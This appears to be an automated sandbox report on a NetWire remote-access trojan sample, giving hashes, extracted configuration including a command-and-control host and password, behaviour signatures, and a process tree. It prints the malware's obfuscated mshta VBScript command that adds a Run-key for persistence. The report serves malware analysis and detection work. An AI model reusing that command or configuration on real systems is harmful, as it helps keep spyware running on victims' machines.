Analysis
-
max time kernel
143s -
max time network
155s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
25-11-2022 08:20
Static task
static1
Behavioral task
behavioral1
Sample
5efb853298c82178c85a13e9ae72bc2b0fa5e44b98d23dfa56c593113b883468.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
5efb853298c82178c85a13e9ae72bc2b0fa5e44b98d23dfa56c593113b883468.exe
Resource
win10v2004-20220812-en
General
-
Target
5efb853298c82178c85a13e9ae72bc2b0fa5e44b98d23dfa56c593113b883468.exe
-
Size
344KB
-
MD5
458280bc7205d36eb55237c1f3be6296
-
SHA1
bf5fc2d5fcfc5c4a1d3c040447b7b3725126f717
-
SHA256
5efb853298c82178c85a13e9ae72bc2b0fa5e44b98d23dfa56c593113b883468
-
SHA512
8b677b9105583c08898675b626a3573637b875968b04a7e5400f9a869c50cd6ab6ecb369c30dbf2706fefe1c4ab2a9e01cfd9a6a7b3fe6a070c22e0f89c5c9c1
-
SSDEEP
3072:QtIpYU2DAYVwTj0ovzU9MQ2r89lNZjMFM+DcyRMKqaPJvGPcl+fo:Q6pzAV0vz1QMCefDc5mwE
Malware Config
Extracted
netwire
www.secdoc.info:1759
-
activex_autorun
false
-
copy_executable
false
-
delete_original
false
-
host_id
HostId-%Rand%
-
keylogger_dir
%AppData%\Logs\
-
lock_executable
false
-
offline_keylogger
true
-
password
manlike123
-
registry_autorun
false
-
use_mutex
false
Signatures
-
NetWire RAT payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/5112-149-0x0000000000400000-0x0000000000457000-memory.dmp netwire -
Executes dropped EXE 1 IoCs
Processes:
Uncrystallisability8.exepid process 5112 Uncrystallisability8.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
5efb853298c82178c85a13e9ae72bc2b0fa5e44b98d23dfa56c593113b883468.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation 5efb853298c82178c85a13e9ae72bc2b0fa5e44b98d23dfa56c593113b883468.exe -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
mshta.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Windows\CurrentVersion\Run mshta.exe Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Zakah = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Uncrystallisability8.exe" mshta.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious use of FindShellTrayWindow 4 IoCs
Processes:
5efb853298c82178c85a13e9ae72bc2b0fa5e44b98d23dfa56c593113b883468.exeUncrystallisability8.exepid process 1840 5efb853298c82178c85a13e9ae72bc2b0fa5e44b98d23dfa56c593113b883468.exe 1840 5efb853298c82178c85a13e9ae72bc2b0fa5e44b98d23dfa56c593113b883468.exe 5112 Uncrystallisability8.exe 5112 Uncrystallisability8.exe -
Suspicious use of SendNotifyMessage 4 IoCs
Processes:
5efb853298c82178c85a13e9ae72bc2b0fa5e44b98d23dfa56c593113b883468.exeUncrystallisability8.exepid process 1840 5efb853298c82178c85a13e9ae72bc2b0fa5e44b98d23dfa56c593113b883468.exe 1840 5efb853298c82178c85a13e9ae72bc2b0fa5e44b98d23dfa56c593113b883468.exe 5112 Uncrystallisability8.exe 5112 Uncrystallisability8.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
5efb853298c82178c85a13e9ae72bc2b0fa5e44b98d23dfa56c593113b883468.exeUncrystallisability8.exepid process 1840 5efb853298c82178c85a13e9ae72bc2b0fa5e44b98d23dfa56c593113b883468.exe 5112 Uncrystallisability8.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
5efb853298c82178c85a13e9ae72bc2b0fa5e44b98d23dfa56c593113b883468.exedescription pid process target process PID 1840 wrote to memory of 5032 1840 5efb853298c82178c85a13e9ae72bc2b0fa5e44b98d23dfa56c593113b883468.exe mshta.exe PID 1840 wrote to memory of 5032 1840 5efb853298c82178c85a13e9ae72bc2b0fa5e44b98d23dfa56c593113b883468.exe mshta.exe PID 1840 wrote to memory of 5032 1840 5efb853298c82178c85a13e9ae72bc2b0fa5e44b98d23dfa56c593113b883468.exe mshta.exe PID 1840 wrote to memory of 5112 1840 5efb853298c82178c85a13e9ae72bc2b0fa5e44b98d23dfa56c593113b883468.exe Uncrystallisability8.exe PID 1840 wrote to memory of 5112 1840 5efb853298c82178c85a13e9ae72bc2b0fa5e44b98d23dfa56c593113b883468.exe Uncrystallisability8.exe PID 1840 wrote to memory of 5112 1840 5efb853298c82178c85a13e9ae72bc2b0fa5e44b98d23dfa56c593113b883468.exe Uncrystallisability8.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\5efb853298c82178c85a13e9ae72bc2b0fa5e44b98d23dfa56c593113b883468.exe"C:\Users\Admin\AppData\Local\Temp\5efb853298c82178c85a13e9ae72bc2b0fa5e44b98d23dfa56c593113b883468.exe"1⤵
- Checks computer location settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1840 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscript:Execute(" str1 = ""WScript.Shell"" : str2 = ""Set WshShell = CrXXteObject(str1)"" : str2 = Replace(str2,""XX"",""ea"") : execute str2 : myKey = ""HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Zakah"" : WshShell.RegWrite myKey,""C:\Users\Admin\AppData\Local\Temp\Uncrystallisability8.exe"",""REG_SZ"" : window.close")2⤵
- Adds Run key to start application
PID:5032
-
-
C:\Users\Admin\AppData\Local\Temp\Uncrystallisability8.exe"C:\Users\Admin\AppData\Local\Temp\Uncrystallisability8.exe"2⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:5112
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
344KB
MD501902361d12834033e78bb91d0f3fb77
SHA19872791bebd9364bdc6385a0499f0af26ad82f61
SHA256482fdea65033a89a6de1a5aedf89ad1463995196282dcdf0be1ccdeb7ab7dfc9
SHA512e76cde02281a67e8b4635ce81ac08606f9597bedd9efbc5dd25a2e0dfb0007394383d8b1df687d7b050c34333ee7853f3d0f13bcc568e9222eb914d3b272ea6f
-
Filesize
344KB
MD501902361d12834033e78bb91d0f3fb77
SHA19872791bebd9364bdc6385a0499f0af26ad82f61
SHA256482fdea65033a89a6de1a5aedf89ad1463995196282dcdf0be1ccdeb7ab7dfc9
SHA512e76cde02281a67e8b4635ce81ac08606f9597bedd9efbc5dd25a2e0dfb0007394383d8b1df687d7b050c34333ee7853f3d0f13bcc568e9222eb914d3b272ea6f